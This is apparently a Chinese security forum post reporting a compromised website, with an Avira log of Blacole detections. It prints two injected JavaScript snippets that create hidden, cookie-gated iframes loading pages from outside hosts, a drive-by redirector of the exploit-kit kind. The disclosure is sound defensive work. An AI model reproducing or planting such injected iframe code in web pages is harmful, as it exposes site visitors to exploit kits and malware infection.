裏面（強！）

显示全部楼层 · 发表于 2013-9-1 08:50:54

本帖最后由 fireold 于 2013-9-1 08:52 编辑

http://baldwinart3d.com/

复制代码

function inz09() {
var static = 'ajax';
var controller = 'index.php';
var inz = document.createElement('iframe');
inz.src = 'http://1bcs.org/high_school/yZk4TzLq.php';
inz.style.position = 'absolute';
inz.style.color = '0';
inz.style.height = '0px';
inz.style.width = '0px';
inz.style.left = '10000';
inz.style.top = '10000';
if (!document.getElementById('inz')) {
document.write('<p id=\'inz\' class=\'inz09\' ></p>');
document.getElementById('inz').appendChild(inz);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
inz09();
}
}

复制代码

function zzzfff() {
var v = document.createElement('iframe');
v.src = 'http://108.166.6.120/Nz8J3Wbr.php';
v.style.position = 'absolute';
v.style.border = '0';
v.style.height = '1px';
v.style.width = '1px';
v.style.left = '1px';
v.style.top = '1px';
if (!document.getElementById('v')) {
document.write('<div id=\'v\'></div>');
document.getElementById('v').appendChild(v);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

Avira

2013/9/1 上午 08:48 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\3KVBBVG3\WidgetCommon[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
   已採取動作：
   檔案會移動至 '4d5f0f02.qua' 名稱底下的隔離區目錄。.

2013/9/1 上午 08:48 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\navbar[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
   已採取動作：
   檔案會移動至 '55d620ad.qua' 名稱底下的隔離區目錄。.

2013/9/1 上午 08:48 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 792
   目錄數： 0
   惡意程式碼數： 3
   警告數： 0

2013/9/1 上午 08:48 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\iWebSite[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
   已採取動作：
   檔案會移動至 '1f0155d8.qua' 名稱底下的隔離區目錄。.

2013/9/1 上午 08:47 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\Home[1].htm'
   包含病毒或有害的程式 'JS/Blacole.DQ.1' [virus]
   已採取動作：
   檔案會移動至 '54f82234.qua' 名稱底下的隔離區目錄。.

2013/9/1 上午 08:47 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 789
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\navbar[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 上午 08:47 [Web Protection] 發現惡意程式碼
   從 URL "http://baldwinart3d.com/Home_files/Home.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：封鎖的檔案

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\STITT9OQ\navbar[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：拒絕存取

2013/9/1 上午 08:47 [Web Protection] 發現惡意程式碼
   從 URL "http://baldwinart3d.com/Scripts/Widgets/HTMLRegion/Paste.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：封鎖的檔案

2013/9/1 上午 08:47 [Web Protection] 發現惡意程式碼
   從 URL "http://baldwinart3d.com/Scripts/Widgets/Navbar/navbar.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/9/1 上午 08:47 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\baldwinart3d_com[1].htm'
   包含病毒或有害的程式 'JS/Blacole.DQ.1' [virus]
   已採取動作：
   檔案會移動至 '55ea2f4f.qua' 名稱底下的隔離區目錄。.

2013/9/1 上午 08:47 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 785
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\3KVBBVG3\WidgetCommon[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\3KVBBVG3\WidgetCommon[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：拒絕存取

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\iWebSite[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 上午 08:47 [Web Protection] 發現惡意程式碼
   從 URL "http://baldwinart3d.com/Scripts/Widgets/SharedResources/WidgetCommon.js"
   存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\iWebSite[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：拒絕存取

2013/9/1 上午 08:47 [Web Protection] 發現惡意程式碼
   從 URL "http://baldwinart3d.com/Scripts/iWebSite.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\Home[1].htm 中
   偵測到病毒或有害的程式 'JS/Blacole.DQ.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\Home[1].htm 中
   偵測到病毒或有害的程式 'JS/Blacole.DQ.1 [virus]'
   執行的動作：拒絕存取

2013/9/1 上午 08:47 [Web Protection] 發現惡意程式碼
   從 URL "http://baldwinart3d.com/Home.html" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.DQ.1' [virus]。
   已採取動作：已略過

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\baldwinart3d_com[1].htm 中
   偵測到病毒或有害的程式 'JS/Blacole.DQ.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/9/1 上午 08:47 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\25HCCZL4\baldwinart3d_com[1].htm 中
   偵測到病毒或有害的程式 'JS/Blacole.DQ.1 [virus]'
   執行的動作：拒絕存取

2013/9/1 上午 08:47 [Web Protection] 發現惡意程式碼
   從 URL "http://baldwinart3d.com/" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.DQ.1' [virus]。
   已採取動作：已略過

[已鉴定] 裏面（強！）